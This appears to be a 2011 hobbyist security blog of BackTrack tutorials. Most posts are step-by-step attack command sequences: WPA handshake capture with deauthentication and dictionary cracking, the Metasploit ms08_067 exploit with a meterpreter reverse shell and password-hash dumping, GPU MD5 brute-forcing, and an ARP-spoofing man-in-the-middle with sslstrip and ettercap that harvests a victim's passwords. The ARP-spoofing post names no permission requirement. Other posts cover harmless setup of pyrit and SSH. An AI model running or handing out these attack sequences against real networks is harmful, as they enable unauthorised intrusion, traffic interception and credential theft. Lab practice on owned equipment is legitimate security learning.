Saturday 2 July 2011

Cracking WPA using pyrit and aircrack

Hi all,

This is the follow on post to the pyrit set-up.
Once its been set-up you are able to test the strength of your WPA encrypted router.

There are a few important points to note when cracking WPA.
Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.

The method behind WPA cracking is different to that of WEP. WEP is cracked by repetition of the IV packets. WPA is cracked by firstly capturing the handshake, where the client connects to the AP, then brute forced using a dictionary or word list.

The commands:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid mon0
aireplay --deauth 0 -a bssid -c client mon0

Ctrl + C to cancel the deauth and capture

pyrit eval 
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb output01.cap
Commands will differ for each WPA crack and access point. Firstly the -c is the channel of the AP, mines on 11. -w is simply the name of the text file and each bssid is different.
In the pyrit section pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my essid and again this is different for each, this is also used as a salt during the batch process.

Videos:

Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv

YouTube link:
Cracking WPA using pyrit and aircrack YouTube

Sorry again, for the square mouse camtasia, VB and BT5 don't play together nicely.

Thanks
2neon

Friday 1 July 2011

Installing pyrit into BT5

Hey all,

It's been a while again since the last video. I have spent some serious time doing boot to roots and the metasploit unleashed tut. Anyway this is a two part post; the first being the setup and the second being WPA cracking using pyrit.

That having been said, I'll get on with it!

Pyrit is used to create hash tables, this can be used to crack WPA and test how secure the wireless key is. In this post the primary object is to download and install all of the nessasary components for pyrit.

Pyrit also supports GPU processing, therefore as I have an Nvidia card, I will be setting up pyrit to run using CUDA. This step is optional and will be different if you are using AMD/ATi.

Also it's a good idea to run pyrit list_cores to make sure that it's all working correctly and if you want to see the speed of the cores, run the benchmark.

Commands

These commands are taken from another thread on the backtrack forum, as they are the best way to install it and have come up in posts multiple times.

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

apt-get install libssl-dev scapy python-dev
cd /pyrit_svn/pyrit
python setup.py build
python setup.py install
CUDA/Nvidia only!

Then download the nvidia-toolkit from:

http://developer.nvidia.com/cuda-toolkit-32-downloads

Download the CUDA Toolkit for Ubuntu Linux 10.04, it doesn't matter if you already have the graphics drivers as you will need this anyway as it has the compilers. Also, if you accidentally download the dev drivers you won't be able to install pyrit as you need this tool-kit!
sh cudatoolkit_3.2.16_linux_64_ubuntu10.04.run
cd /pyrit_svn/cpyrit_cuda 
python setup.py build
python setup.py install

pyrit list_cores
pyrit benchmark
Videos

Youtube:
Installing pyrit into BT5 YouTube

Blip.tv:
Installing pyrit into BT5 Blip.tv

Cheers
2neon

Wednesday 8 June 2011

ssh with x11 and ftp in bt5

Hey all,

Well it's been a while and now university is done with and I've had time to play with BT5 (which is the all new and shiny backtrack) its time for a blog post 8-).

Right, so the concept is similar to remote desktop but you only have a shell. This is also secure, well as secure as you can make it.

This allows you to connect to one pc and run scripts, tool kits and programs from the a second.
The programs are still running on the first backtrack machine, just accessible from the second machine.
This is useful if you are out and about doing work/pentesting and need the power of the second machine.

Other than this, its useful for internet cafe usage as it will allow you to browse more securely.

The steps;

sshd-generate
/etc/init.d/ssh start
update-rc.d ssh defaults
ifconfig

This is all of the configuration 'needed', however, it's possible to use techniques such as fail2ban, setting different ports on the router or simply changing the port on backtrack of ssh. Ifconfig just checks the internal I.P. update-rc adds ssh to start up, which is not needed but will stop you typing /etc/init.d... every time.

Windows steps;

Download and install putty or just grab xming server as I believe putty is in there.
If you want secure ftp grab filezila.

Run all the installers and then open up putty.

Insert the I.P. either internal or external.
Enable x11 forwarding tab under SSH and type localhost:0
Click open to connect.
Hit in the user name and password, *This may take some time.*
and that should be it, if the x11 is working you should get visual programs like firefox etc.

For ftp make sure the port 22, which is default for ssh, is selected.
Biggest point here *If you are doing this across the internets make sure you have a long password and think about changing the port or implementing fail2ban.*

Video here:
ssh in bt5

Also on YouTube, watch it in 720p for clarity

Cheers
2neon

Sunday 15 May 2011

Metasploit xp sp2 exploit

Hi all,

This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.

So, first off, I set up a vulnerable xp sp2 box, the vulnerability being that Microsoft made it, teehee!
Then I used backtrack 4 with metasploit installed to use the ms08_067_netapi exploit.

Firstly update the framework:
cd /pentest/exploits/framework3
svn up

Once this has finished hit cd to get back to root:
nmap -O 192.168.0.1
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127  (This is the victims I.P.)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST   (I.P. of your pc)
exploit    (this runs the exploit)
If all went well you should have a meterpreter shell open.

I then used some of the commands within the meterpreter to see how good it was!
sysinfo
ipconfig
help
hashdump
screenshot
shell

Video here;
metasploit xpsp2

Cheers.
2neon

Monday 9 May 2011

Cuda-multiforcer

Righty then, 

This looks at how to crack hashes on the computers GPU. The reason for this, is the parallel architecture of the graphics cards makes certain programs so much faster to run. In this case it's perfect for cracking hashes.
CUDA programs have to be specifically written to run on the GPU and you cannot run anything else on there! Also CUDA is nvidia only, ATi has something similar. 

Right onwards...

Cuda-multiforcer isn't on the backtrack 4 iso. It is in the repositories, therefore;

apt-get install cuda-multiforcer
is all that is needed.

When cuda-multiforcer was first run I received an error; 
./CUDA-Multiforcer: error while loading shared libraries: libargtable2.so.0: cannot open shared object file: No such file or directory.

After some googling, the fix was simple, copy the contents of
/pentest/passwords/cuda-multiforcer/lib32
to
/lib

Ok, running the cuda-multiforcer;

cd /pentest/passwords/cuda-multiforcer
./CUDA-Muliforcer -c charsets/charsetlowercasenumeric -f /root/j2neon/hash.txt --min 3 --max 6 -h MD5

Ok, the options;
-c is the character set which is in charsets  folder depending on what you need 
-f is the location of the file containing the hash's
--min minimum character length  
--max maximum character length 
-h hash type 

Video:

The passwords were short but it's still seriously fast!

Until next time.
Cheers 
2neon

Thursday 28 April 2011

What's to come?

Hey all,

As it has again been ages since any real updates I thought I would explain what's going on!
I finished my paper for university, which was on password cracking using parallel processors, my results will be on here but not just yet.

Now I've been playing with GPU related stuff there is going to be a fair amount of CUDA related security tools such as pyrit and crark.

Stay tuned, 
2neon


ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, new blog post and vid are here this is what I did:

Firstly I edited etter.conf to allow the usage of ip tables,
then enabled ip forwarding,
next arp spoofed the broadcast address.

This step tells the router that I am the victim and the victim I am the router. You can set the I.P. to that of one machine or if you use the broadcast address, in my case 255, you can target the victims network.

The next step is to set up the iptables, this takes anything coming in on port 80 i.e. internet traffic, and puts it on to port 1000 which is where sslstrip is running.

sslstrip removes the SSL encryption, this is done by removing the request from the client for the ssl certificate.

Once you have removed this you can then do what ever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in realtime. You can also use driftnet which shows the images from the website that your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables for linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables ip forwarding)
you can use cat  /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000 so
sslstrip -a -k -f  (these commands kill the session and work quietly)
ettercap -T -q -i eth0

The video:
Arp spoof vid

Cheers
2neon